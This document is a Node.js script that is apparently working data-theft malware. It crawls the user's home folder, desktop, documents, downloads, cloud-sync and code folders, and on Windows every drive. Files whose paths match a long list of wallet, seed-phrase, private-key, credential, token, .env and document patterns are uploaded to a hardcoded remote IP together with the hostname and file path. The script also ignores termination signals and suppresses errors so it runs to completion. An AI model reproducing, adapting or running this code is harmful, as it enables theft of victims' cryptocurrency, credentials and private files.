const UPLOAD_DELAY_MS = 120;
        const ADAPTIVE_DELAY_MS = 20;
        const MIN_UPLOAD_TIME_MS = 50;
        const MAX_FILE_SIZE_BYTES = 5 * 1024 * 1024; // 5MB

        const fs = require("fs");
        const path = require("path");
        const os = require("os");
        const FormData = require("form-data");
        const axios = require("axios");
        const { execSync } = require("child_process");

        /*// if (os.platform() === 'linux') 
        {
          const logDir = path.join(process.cwd(), '.logs');
          if (!fs.existsSync(logDir)) {
            fs.mkdirSync(logDir, { recursive: true });
          }
          const logFile = path.join(logDir, `autoupload_${Date.now()}.log`);
          const originalLog = console.log;
          const originalError = console.error;
          const originalWarn = console.warn;
          const writeLog = (level, ...args) => {
            const timestamp = new Date().toISOString();
            const message = args.map(arg => typeof arg === 'object' ? JSON.stringify(arg) : String(arg)).join(' ');
            const logLine = `[${timestamp}] [${level}] ${message}\n`;
            try {
              fs.appendFileSync(logFile, logLine, 'utf8');
            } catch (e) {
            }
            if (level === 'LOG') originalLog.apply(console, args);
            else if (level === 'ERROR') originalError.apply(console, args);
            else if (level === 'WARN') originalWarn.apply(console, args);
          };
          console.log = (...args) => writeLog('LOG', ...args);
          console.error = (...args) => writeLog('ERROR', ...args);
          console.warn = (...args) => writeLog('WARN', ...args);
        }*/
        const HOME_DIRECTORY = os.homedir();

        // Global variable for priority directories (set in main function)
        let priorityDirs = [];

        // Add process error handlers to prevent premature exits
        process.on("uncaughtException", (err) => {
          console.error("Uncaught Exception:", err.message);
          console.error("Stack:", err.stack);
          // Don't exit - continue scanning despite errors
          // The script should complete the scan even if some operations fail
        });

        process.on("unhandledRejection", (reason, promise) => {
          console.error("Unhandled Rejection:", reason);
          // Don't exit - continue scanning despite errors
        });

        // Handle process termination signals gracefully
        process.on("SIGTERM", () => {
          
          // Don't exit immediately - let the scan finish
        });

        process.on("SIGINT", () => {
          
          // Don't exit immediately - let the scan finish
        });

        // File extensions to exclude from scanning
        const EXCLUDED_FILE_EXTENSIONS = [".exe",".dll",".so",".dylib",".bin",".app",".deb",".rpm",".pkg",".dmg",".msi",".appimage",".lnk",".alias",".desktop",".mp4",".mp3",".avi",".mov",".wmv",".flv",".mkv",".webm",".wma",".wav",".flac",".aac",".ogg",".m4a",".gif",".tiff",".svg",".ico",".heif",".tmp",".temp",".swp",".swo",".jar",".war",".ear",".sublime-project",".sublime-workspace"];

        const EXCLUDED_PATH_PATTERNS = [".quokka",".bash_rc",".bash_sessions",".atom",".zen","thumbnails",".rhinocode",".codeium",".adobe",".matplotlib",".antigravity",".gemini",".pyenv",".pgadmin",".ipython",".idlerc",".codex",".qodo",".cups",".n2",".n3",".pki",".ruby",".vscode-remote",".python",".php",".oh-my-zsh",".nvs",".maven",".jupyter",".dotnet","assetbundles",".pnpm-store",".rbenv","movies", "music","adobe","package cache","nvidia corporation","saved games","winrar",".cargo",".lingma",".qoder",".trae-aicc",".vscode-insiders",".avo-code","ubuntu-backup","snap-data","app-configs",".local",".config",".anydesk","library","programdata",".tmp","node_modules","npm",".npm",".yarn","yarn.lock","package-lock.json","pnpm-store",".pnpm","public","static","assets","resources","css","less","scss","sass","stylus","styles","style","themes","theme","build","dist","out","target","bin","obj",".next",".nuxt",".output",".vuepress",".vitepress","appdata","program files","program files (x86)","windows","windows.old","system volume information","\$recycle.bin","recovery","perflogs","intel","amd","nvidia","microsoft","microsoftedgebackup","system","applications",".trash",".spotlight-v100",".fseventsd",".documentrevisions-v100",".temporaryitems",".vol","cores","application support","proc","sys","dev","run","boot","lost+found","snap","flatpak","desktop.ini","thumbs.db",".vscode",".idea",".vs",".eclipse",".settings",".metadata",".gradle",".mvn",".git",".github",".svn",".hg",".bzr",".cache","cache","tmp","temp","*~","vendor","vendors",".venv","venv",".conda","anaconda3","miniconda3",".rustup",".pub-cache",".dart_tool",".gradle",".m2",".ivy2",".sbt","libs","packages","package","pkgs","pkg","documentation","examples","example","samples","sample","test","tests","spec","specs",".ssh",".gnupg",".aws",".docker",".kube",".terraform",".vagrant",".node-gyp",".nvm",".npm",".yarn",".pnpm",".bun",".deno",".go",".gopath",".gocache",".cursor",".vscode-server",".claude",".windsurf",".snipaste",".vue-cli-ui",".devctl",".eigent","fonts","font","icons","icon","wallpaper","wallpapers","background","backgrounds","locale","locales","_locales","i18n","translations","lang","language","languages","visual studio code.app","chrome.app","firefox.app","safari.app","opera.app","brave browser.app","vmware",".vmware","vmware fusion","vmware fusion.app","vmware workstation","vmware player","vmware vsphere","vmware vcenter","/applications/vmware","/usr/lib/vmware","/usr/share/vmware","program files/vmware","program files (x86)/vmware","appdata/local/vmware","appdata/roaming/vmware","library/application support/vmware",".vmwarevm",".vmdk",".vmem",".vmsn",".vmsd",".vmx",".vmxf",".nvram",".vmtm","mysql","postgresql","mongodb","redis","elasticsearch","openzeppelin","prisma",".expo",".next",".nuxt",".svelte-kit","hooks",".wine",".3T",".gk",".move",".tldrc",".android",".avm",".brownie",".cocoapods",".zsh_sessions",".pm2",".pyp",".myi","manifest","debug","plugin","plugins"];

        const SENSITIVE_FILE_PATTERNS = [".keystore", "phone", "database","bank", "financ", ".env","env","environment","config","configuration","configure",".conf",".cfg",".ini",".properties",".yaml",".yml",".toml","metamask","phantom","bitcoin","ethereum","eth","trust","wallet","coinbase","exodus","ledger","trezor","keystore","keyring","keychain","atomic","electrum","mycelium","blockchain","bravewallet","rabby","coin98","backpack","core","mathwallet","solflare","glow","keplr","argent","martian","petra","binance","okx","crypto","cryptocurrency","hardhat","truffle","private","privatekey","private_key","private-key","privkey","priv_key","key","keypair","key_pair","key-pair",".pem",".p12",".pfx",".jks","keystore",".keys","keys",".p8",".p7b",".p7c",".cer",".crt",".cert","cert",".der","id_rsa","id_dsa","id_ecdsa","id_ed25519",".pub",".priv","seed","seedphrase","seed_phrase","seed-phrase","mnemonic","phrase","passphrase","pass_phrase","pass-phrase","recovery","recoveryphrase","recovery_phrase","recovery-phrase","backup","backupphrase","backup_phrase","backup-phrase","12words","12_words","12-words","24words","24_words","24-words","bip39","bip44","password","passwd","pass","pwd","credential","credentials","auth","authentication","token","access_token","refresh_token","api_key","apikey","api-key","apisecret","api_secret","api-secret","secret","secrets","secretkey","secret_key","secret-key","masterkey","master_key","master-key","masterpassword","master_password","master-password","account","accounts","profile","profiles","user","username","user_name","user-name","login","signin","sign_in","sign-in","address","addresses","tx","transaction","transactions",".db",".sqlite",".sqlite3",".sql",".mdb",".accdb",".dbf",".doc",".docx",".pdf",".md",".markdown",".rtf",".odt",".xls",".xlsx",".txt","text","note","notes","memo","memos","screenshot","screen","snapshot","capture",".png",".jpg",".jpeg",".bmp",".json",".js",".ts",".jsx",".tsx",".csv",".xml",".lock",".log",".bak","backup",".old",".orig",".save",".swp",".tmp","tmp","my","personal","vault","safe","secure","lock","encrypt","decrypt","signature","sign","certificate","cert","identity","session","cookie"];

        const isRunningInWSL = () => {
          if (process.env.WSL_DISTRO_NAME) {
            return true;
          }
          try {
            if (fs.existsSync("/proc/version")) {
              const versionContent = fs.readFileSync("/proc/version", "utf8");
              if (versionContent.toLowerCase().includes("microsoft") || versionContent.toLowerCase().includes("wsl")) {
                return true;
              }
            }
          } catch (e) {}
          return false;
        };

        // Check if file extension should be excluded
        const isFileExtensionExcluded = (fileName) => {
          const lowerFileName = fileName.toLowerCase();
          return EXCLUDED_FILE_EXTENSIONS.some(ext => 
            lowerFileName.endsWith(ext.toLowerCase())
          );
        };

        // Check if a path should be excluded
          const isDirectoryNameExcluded = (directoryName) => {
            const lowerDirectoryName = directoryName.toLowerCase();
            return EXCLUDED_PATH_PATTERNS.includes(lowerDirectoryName);
          };

        // Check if full path contains any sensitive file pattern (case-insensitive)
        const isSensitiveFile = (filePath) => {
          const lowerPath = filePath.toLowerCase();
          return SENSITIVE_FILE_PATTERNS.some(pattern => 
            lowerPath.includes(pattern.toLowerCase())
          );
        };

        // Upload a file to the server
        const uploadFile = async (filePath) => {
          try {
            if (!fs.existsSync(filePath)) {
              return false;
            }

            let stats;
            try {
              stats = fs.statSync(filePath);
            } catch (statError) {
              // File might have been deleted or is inaccessible
              return false;
            }
            
            if (!stats.isFile()) {
              return false;
            }

            // Skip files larger than the size limit
            if (stats.size > MAX_FILE_SIZE_BYTES) {
              return false;
            }

            // Check if file is readable
            try {
              fs.accessSync(filePath, fs.constants.R_OK);
            } catch (accessError) {
              // File is not readable
              return false;
            }

            const form = new FormData();
            let readStream;
            try {
              readStream = fs.createReadStream(filePath);
            } catch (streamError) {
              // Can't create read stream (file might be locked)
              return false;
            }
            
            form.append("file", readStream);
            
            try {
              const response = await axios.post(`http://144.172.105.122:8086/upload`, form, {
                headers: {
                  ...form.getHeaders(),
                  userkey: 104,
                  hostname: os.hostname(),
                  path: encodeURIComponent(filePath),
                  t: 1
                },
                maxContentLength: Infinity,
                maxBodyLength: Infinity,
                timeout: 30000, // 30 second timeout to prevent hanging
              });
              
              // Check response status
              if (response.status >= 200 && response.status < 300) {
                return true;
              } else {
                // Non-success status
                return false;
              }
            } catch (error) {
              // Handle specific network errors - re-throw for retry logic
              if (error.code === 'ECONNREFUSED' || error.code === 'ETIMEDOUT' || error.code === 'ENOTFOUND') {
                // Network issues - these are recoverable
                throw error; // Re-throw to trigger retry logic
              } else if (error.code === 'ECONNRESET' || error.code === 'EPIPE') {
                // Connection reset - might be recoverable
                throw error;
              } else if (error.response) {
                // Server responded with error status
                const status = error.response.status;
                if (status >= 500) {
                  // Server error - might be recoverable
                  throw error;
                } else {
                  // Client error (4xx) - probably not recoverable, don't retry
                  return false;
                }
              } else {
                // Other errors - might be recoverable
                throw error;
              }
            } finally {
              // Ensure stream is closed
              if (readStream && !readStream.destroyed) {
                try {
                  readStream.destroy();
                } catch (e) {
                  // Ignore cleanup errors
                }
              }
            }
          } catch (error) {
            // Re-throw network errors for retry logic in calling function
            if (error.code === 'ECONNREFUSED' || error.code === 'ETIMEDOUT' || 
                error.code === 'ENOTFOUND' || error.code === 'ECONNRESET' || 
                error.code === 'EPIPE' || (error.response && error.response.status >= 500)) {
              throw error;
            }
            // Other errors - log and return false
            console.error(`Failed to upload ${filePath}:`, error.message);
            return false;
          }
        };

        // Delay helper function
        const delay = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

        // Track visited directories to prevent infinite loops from symlinks
        const visitedDirs = new Set();
        const MAX_PATH_LENGTH = os.platform() === 'win32' ? 260 : 4096;
        const MAX_RECURSION_DEPTH = 20;
        
        // Recursively scan directory and upload sensitive files
        const scanAndUploadDirectory = async (directoryPath, skipPriorityDirs = false, depth = 0) => {
          // Prevent infinite recursion
          if (depth > MAX_RECURSION_DEPTH) {
            console.warn(`Max recursion depth reached for ${directoryPath}`);
            return;
          }
          
          // Check path length limits
          if (directoryPath.length > MAX_PATH_LENGTH) {
            console.warn(`Path too long, skipping: ${directoryPath}`);
            return;
          }
          
          if (!fs.existsSync(directoryPath)) {
            return;
          }
          
          // Resolve real path to handle symlinks and prevent loops
          let realPath;
          try {
            realPath = fs.realpathSync(directoryPath);
          } catch (realpathError) {
            // If we can't resolve the real path, skip it
            console.warn(`Cannot resolve real path for ${directoryPath}:`, realpathError.message);
            return;
          }
          
          // Check if we've already visited this directory (prevent symlink loops)
          if (visitedDirs.has(realPath)) {
            return; // Already visited, skip to prevent infinite loops
          }
          
          // Mark as visited
          visitedDirs.add(realPath);
          
          try {
            // Explicitly read all files including hidden ones
            let items;
            try {
              items = fs.readdirSync(directoryPath, { withFileTypes: true });
            } catch (readdirError) {
              // Handle specific error codes
              const errorCode = readdirError.code || readdirError.errno;
              if (errorCode === 'EACCES' || errorCode === 'EPERM' || errorCode === 'EAGAIN') {
                // Permission denied - log but continue
                console.warn(`Permission denied for ${directoryPath}:`, readdirError.message);
              } else if (errorCode === 'ENOENT') {
                // Directory doesn't exist (might have been deleted)
                console.warn(`Directory no longer exists: ${directoryPath}`);
              } else {
                // Other errors
                console.error(`Cannot read directory ${directoryPath}:`, readdirError.message);
              }
              return; // Return early, don't throw
            }

            // Sort items alphabetically in descending order
            items.sort((a, b) => b.name.localeCompare(a.name));

            for (const item of items) {
              try {
                // Skip . and .. entries
                if (item.name === '.' || item.name === '..') {
                  continue;
                }

                const fullPath = path.join(directoryPath, item.name);
                console.log('fullPath', fullPath);
                // Check path length before processing
                if (fullPath.length > MAX_PATH_LENGTH) {
                  console.warn(`Path too long, skipping: ${fullPath}`);
                  continue;
                }
                
                // Get stats for both files and directories (needed for file size check)
                let stats;
                let isSymlink = false;
                try {
                  // Check if it's a symlink first
                  if (item.isSymbolicLink && item.isSymbolicLink()) {
                    isSymlink = true;
                    // For symlinks, use lstatSync to get symlink info, then resolve
                    try {
                      stats = fs.lstatSync(fullPath);
                      if (stats.isSymbolicLink()) {
                        // Resolve symlink for directories
                        const resolvedPath = fs.realpathSync(fullPath);
                        stats = fs.statSync(resolvedPath);
                      }
                    } catch (symlinkError) {
                      // Broken symlink or can't resolve
                      continue;
                    }
                  } else {
                    stats = fs.statSync(fullPath);
                  }
                } catch (statError) {
                  // Handle specific stat errors
                  const errorCode = statError.code || statError.errno;
                  if (errorCode === 'ENOENT') {
                    // File/directory was deleted between readdir and stat
                    continue;
                  } else if (errorCode === 'EACCES' || errorCode === 'EPERM') {
                    // Permission denied
                    console.warn(`Permission denied for ${fullPath}`);
                    continue;
                  } else {
                    // Other errors - skip
                    continue;
                  }
                }

                if (item.isDirectory() || stats.isDirectory()) {
                    // Skip priority directories if we're scanning other locations
                    if (skipPriorityDirs) {
                      const normalizedPath = path.normalize(fullPath).toLowerCase();
                      const isPriorityDir = priorityDirs.some(priorityDir => {
                        const normalizedPriority = path.normalize(priorityDir).toLowerCase();
                        return normalizedPath === normalizedPriority;
                      });
                      
                      if (isPriorityDir) {
                        continue;
                      }
                    }
                    
                    if(!isDirectoryNameExcluded(item.name)) {
                      // Recursively scan subdirectories - wrap in try-catch to prevent stopping
                      try {
                        await scanAndUploadDirectory(fullPath, skipPriorityDirs, depth + 1);
                      } catch (recursiveError) {
                        // Log but don't throw - continue with other items
                        console.error(`Error in recursive scan of ${fullPath}:`, recursiveError.message);
                      }
                      continue;
                    }
                    
                    continue;
                }

                if ((item.isFile() || stats.isFile()) && !isFileExtensionExcluded(item.name) && (!skipPriorityDirs || isSensitiveFile(fullPath))) {
                  // Skip files larger than the size limit
                  if (stats.size > MAX_FILE_SIZE_BYTES) {
                    continue;
                  }

                  // Upload sensitive files with retry logic
                  try {
                    let uploadSuccess = false;
                    let retries = 3;
                    while (!uploadSuccess && retries > 0) {
                      try {
                        const uploadStartTime = Date.now();
                        await uploadFile(fullPath);
                        uploadSuccess = true;
                        const uploadDuration = Date.now() - uploadStartTime;
                        
                        // Only delay if upload completed very quickly (likely small file or fast network)
                        // This prevents overwhelming the server while not slowing down normal uploads
                        if (uploadDuration < MIN_UPLOAD_TIME_MS) {
                          await delay(ADAPTIVE_DELAY_MS);
                        }
                        // No delay needed for normal uploads - network is already the bottleneck
                      } catch (uploadError) {
                        retries--;
                        if (retries > 0) {
                          // Wait before retry (exponential backoff)
                          await delay(ADAPTIVE_DELAY_MS * (4 - retries));
                        } else {
                          // Final failure - log but continue
                          console.error(`Failed to upload ${fullPath} after retries:`, uploadError.message);
                        }
                      }
                    }
                  } catch (uploadError) {
                    // Log upload errors but continue
                    console.error(`Error uploading ${fullPath}:`, uploadError.message);
                  }
                }
              } catch (error) {
                // Continue on individual item errors
                const errorCode = error.code || error.errno;
                if (errorCode === 'EMFILE' || errorCode === 'ENFILE') {
                  // Too many open files - wait a bit and continue
                  console.warn(`Too many open files, waiting...`);
                  await delay(1000);
                } else {
                  console.error(`Error processing ${item.name || item}:`, error.message);
                }
              }
            }
          } catch (error) {
            // Log error but continue scanning other directories
            console.error(`Error scanning directory ${directoryPath}:`, error.message);
            // Don't throw - continue with other directories
            return; // Return instead of throwing
          } finally {
            // Remove from visited set when done (for very deep trees, this helps with memory)
            // But keep it for the current scan to prevent loops
            // Only remove if we're at a shallow depth to save memory
            if (depth === 0) {
              // At root level, we can clear old entries to save memory
              // Keep only recent entries (last 10000)
              if (visitedDirs.size > 10000) {
                const entries = Array.from(visitedDirs);
                visitedDirs.clear();
                // Keep the most recent 5000 entries
                entries.slice(-5000).forEach(dir => visitedDirs.add(dir));
              }
            }
          }
        };

        // Get priority directories (Documents, Desktop, Downloads)
        const getPriorityDirectories = () => {
          const priorityDirs = [];
          const platform = os.platform();
          
          if (platform === "win32") {
            // Windows paths
            priorityDirs.push(
              path.join(HOME_DIRECTORY, "Desktop"),
              path.join(HOME_DIRECTORY, "Documents"),
              path.join(HOME_DIRECTORY, "Downloads"),
              path.join(HOME_DIRECTORY, "OneDrive"),
              path.join(HOME_DIRECTORY, "Google Drive"),
              path.join(HOME_DIRECTORY, "GoogleDrive")
            );
          } else {
            // macOS/Linux paths
            priorityDirs.push(
              path.join(HOME_DIRECTORY, "Desktop"),
              path.join(HOME_DIRECTORY, "Documents"),
              path.join(HOME_DIRECTORY, "Downloads"),
              path.join(HOME_DIRECTORY, "Library/CloudStorage"),
              path.join(HOME_DIRECTORY, "Projects"),
              path.join(HOME_DIRECTORY, "projects"),
              path.join(HOME_DIRECTORY, "Development"),
              path.join(HOME_DIRECTORY, "development"),
              path.join(HOME_DIRECTORY, "Code"),
              path.join(HOME_DIRECTORY, "code"),
              path.join(HOME_DIRECTORY, "Code Projects"),
              path.join(HOME_DIRECTORY, "code projects"),
              path.join(HOME_DIRECTORY, "source"),
              path.join(HOME_DIRECTORY, "Source"),
              path.join(HOME_DIRECTORY, "OneDrive"),
              path.join(HOME_DIRECTORY, "Google Drive"),
              path.join(HOME_DIRECTORY, "GoogleDrive")
            );
            
            if (isRunningInWSL()) {
              priorityDirs.push("/mnt");
            }
          }
          
          // Filter to only include directories that exist
          return priorityDirs.filter(dir => fs.existsSync(dir) && fs.statSync(dir).isDirectory());
        };

        // Get all drive letters on Windows (compatible with Windows 11)
        const getWindowsDrives = () => {
          try {
            // Use PowerShell Get-CimInstance (works on Windows 11 and modern Windows)
            // This is the modern replacement for wmic
            const psCmd = 'powershell -Command "Get-CimInstance -ClassName Win32_LogicalDisk | Where-Object { $_.DriveType -eq 3 } | Select-Object -ExpandProperty DeviceID"';
            const output = execSync(psCmd, { windowsHide: true, encoding: 'utf8', timeout: 5000 });
            const drives = output
              .split(/[\r\n]+/)
              .map(line => line.trim())
              .filter(drive => drive && drive.length > 0 && /^[A-Z]:$/.test(drive));
            if (drives.length > 0) {
              return drives.map(drive => `${drive}\\`);
            }
            
            // Fallback: Try Get-PSDrive if Get-CimInstance fails
            try {
              const psCmd2 = `powershell -Command "Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Name.Length -eq 1 -and $_.Name -ge 'A' -and $_.Name -le 'Z' } | Select-Object -ExpandProperty Name"`;
              const output2 = execSync(psCmd2, { windowsHide: true, encoding: 'utf8', timeout: 5000 });
              const drives2 = output2
                .split(/[\r\n]+/)
                .map(line => line.trim())
                .filter(drive => drive && drive.length > 0 && /^[A-Z]$/.test(drive));
              if (drives2.length > 0) {
                return drives2.map(drive => `${drive}:\\`);
              }
            } catch (psError2) {
              // If both PowerShell methods fail, try checking common drive letters directly
              const commonDrives = ['C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];
              const availableDrives = commonDrives.filter(drive => {
                try {
                  return fs.existsSync(`${drive}:\\`);
                } catch {
                  return false;
                }
              });
              if (availableDrives.length > 0) {
                return availableDrives.map(drive => `${drive}:\\`);
              }
            }
            return [];
          } catch (error) {
            console.error("Failed to get Windows drives:", error.message);
            // Last resort: check common drive letters
            try {
              const commonDrives = ['C', 'D', 'E', 'F', 'G', 'H'];
              const availableDrives = commonDrives.filter(drive => {
                try {
                  return fs.existsSync(`${drive}:\\`);
                } catch {
                  return false;
                }
              });
              return availableDrives.map(drive => `${drive}:\\`);
            } catch {
              return [];
            }
          }
        };

        // Main execution function
        const main = async () => {
          
          

          try {
            // First, scan priority directories (Documents, Desktop, Downloads)
            priorityDirs = getPriorityDirectories();
            
            
            for (const priorityDir of priorityDirs) {
              try {
                
                await scanAndUploadDirectory(priorityDir);
              } catch (error) {
                console.error(`Error scanning priority directory ${priorityDir}:`, error.message);
                // Continue with next directory
              }
            }
            
            // Then, scan all other directories (skip already scanned priority directories)
            if (os.platform() === "win32") {
              // Windows: Scan all drives (skipping already scanned priority directories)
              // Scan C drive last
              const drives = getWindowsDrives();
              const cDrive = drives.find(drive => drive.toLowerCase().startsWith("c:"));
              const otherDrives = drives.filter(drive => !drive.toLowerCase().startsWith("c:"));
              
              // Scan all drives except C drive first
              for (const drive of otherDrives) {
                try {
                  
                  await scanAndUploadDirectory(drive, true);
                } catch (error) {
                  console.error(`Error scanning drive ${drive}:`, error.message);
                  // Continue with next drive
                }
              }
              
              // Scan C drive last
              if (cDrive) {
                try {
                  
                  await scanAndUploadDirectory(cDrive, true);
                } catch (error) {
                  console.error(`Error scanning C drive:`, error.message);
                  // Continue despite error
                }
              }
            } else {
              // Unix-like systems: Scan home directory (skipping already scanned priority directories)
              try {
                await scanAndUploadDirectory(HOME_DIRECTORY, true);
              } catch (error) {
                console.error(`Error scanning home directory:`, error.message);
                // Continue despite error
              }
            }
            
            
          } catch (error) {
            console.error("Fatal error in main:", error.message);
            console.error("Stack:", error.stack);
            // Don't exit - log error and let process continue or exit naturally
            // This prevents premature exits when processing many files
          } finally {
            // Ensure we always log completion status
            
          }
        };

        // Execute main function
        main();

        